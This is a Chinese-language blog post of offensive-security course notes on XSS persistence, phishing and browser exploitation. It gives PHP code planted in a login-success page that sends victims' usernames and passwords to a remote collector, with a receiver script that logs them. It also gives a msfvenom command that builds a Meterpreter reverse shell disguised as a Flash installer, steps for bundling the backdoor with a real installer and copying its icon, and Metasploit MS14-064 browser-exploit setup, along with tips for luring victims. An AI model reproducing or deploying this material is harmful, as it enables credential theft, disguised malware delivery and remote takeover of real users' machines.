SEC-2022版-0027-WEB攻防-18-通用漏洞之XSS跨站-权限维持&钓鱼捆绑&浏览器漏洞
XSS-后台植入Cookie&表单劫持(权限维持)
权限维持,获取账密后,防止权限被杀掉后无法再次取得权限。
取得权限不一定后台就能登录
后台能登录不一定是取得权限
条件:已取得相关web权限后
写入代码到登录成功文件(登录成功后的文件,里面的用户名和密码都是正确的,需要将正确的代码发送出来,可以使用js自动触发发送到远程地址进行处理),利用beef或xss平台实时监控Cookie等凭据实现权限维持
- 实现下面成功页面账密劫持的案例的重要前提:改写/插入下面的语句到成功登录的那个文件夹的指定位置获取账密
# 写完后,在成功的页面被访问时会偷偷的触发
$a = '<script src="http://xxx:80/get.php?username='.$用户名.'&pass='.$密码.'"></script>';
echo $a;远程可以这么写,把内容自动写入文件。
$u = $_GET['username'];
$p = $_GET['pass'];
$myfile = fopen('newfile.txt','w+');
fwrite($myfile,$u);
fwrite($myfile,' | ');
fwrite($myfile,$p);
fwrite($myfile,'\n');
fclose($myfile);若存在同源策略或防护情况下(获取cookie时是残缺的),Cookie获取失败可采用表单劫持或数据明文传输实现
XSS-Flash钓鱼配合MSF捆绑上线
XSS经常配个钓鱼实现。
条件:beef上线受控后或直接钓鱼(受害者爱看SESE)
使用Flash的伪造项目,欺骗对方误以为这就是flash官网
把下载地址”立即下载”的敌方的网址换为后门地址
后门需要和正常的文件进行捆绑
- 生成后门(,然后给后门加免杀)
#我方服务器IP地址 生成软件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe- 下载官方文件-保证安装正常
压缩捆绑文件-解压提取运行
- 捆绑方法:
- 选中两个exe,选择rar或者zip压缩
- 选择”创建自解压文件”
- 选择”高级”,选择”自解压”选项,常规类选择解压到”C:\windows\tmp”
- 点击”设置”,
- 解压后运行:那个正常的文件,C:\windows\tmp\flash.exe
- 解压前运行:后门文件”C:\windows\tmp\xxx.exe”
- 最后一步,将图标进行修改:
- 可以使用Restorator进行修改
- 导出官方ICO,覆盖掉伪装文件原来的ICO
- 可以使用py或者其它cmd的方式进行修改。
- 可以使用Restorator进行修改
- 捆绑方法:
XSS-浏览器网马配合MSF访问上线
MSF配置监听状态-(木马监听)
- 和上面的配置一样
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0 # 代表本地的网卡
set lport 6666
run受害方
- 攻击的目标是客户端,对方必须下载下来并且安装才能成功。
- 诱使受害者访问URL-语言要适当 -(直接发给对方)
- 例如:对方感兴趣的视频,需要点击视频跳出更新按钮,合情合理。
- 访问界面的没关系问题
- 使用XSS让其自动执行脚本,跳转
- 诱使受害者访问URL-语言要适当 -(直接发给对方)
- 攻击的目标是客户端,对方必须下载下来并且安装才能成功。
MS浏览器漏洞
- 浏览器漏洞,直接攻击浏览器,省去了安装。
- 访问特定地址后触发,危害性太大,网上资料不全面。
- 危害性较小:MS14
- Kali自带MSF平台
- 思路:让对方访问即可,当对方访问特定地址时,特定地址会自动上线到我方攻击机
- 前提:特定版本,且对方没有打补丁
条件:beef上线受控后或直接钓鱼(浏览器存在0day)
- 配置MSF生成URL
use exploit/windows/browser/ms14_064_ole_code_execution
set allowpowershellprompt true
set target 1
run- 诱使受害者访问URL-语言要适当
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 矢幽武博客!
评论